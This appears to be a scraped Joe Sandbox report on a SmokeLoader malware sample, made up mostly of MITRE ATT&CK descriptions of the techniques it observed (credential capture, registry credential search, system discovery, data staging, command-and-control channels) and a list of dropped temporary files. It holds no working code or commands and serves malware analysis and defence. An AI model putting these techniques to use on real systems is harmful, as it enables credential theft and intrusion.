Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report OCYe9qcxiM.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\354F.exe

C:\Users\user\AppData\Local\Temp\4470.exe

C:\Users\user\AppData\Local\Temp\E276.tmp

C:\Users\user\AppData\Local\Temp\E276.tmp-shm

C:\Users\user\AppData\Local\Temp\E7F5.tmp

C:\Users\user\AppData\Local\Temp\ECAA.tmp

C:\Users\user\AppData\Local\Temp\ED86.tmp

C:\Users\user\AppData\Local\Temp\EE52.tmp

C:\Users\user\AppData\Local\Temp\EF9B.tmp

C:\Users\user\AppData\Local\Temp\F0F4.tmp

C:\Users\user\AppData\Local\Temp\F1A1.tmp

Windows Analysis Report
OCYe9qcxiM.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre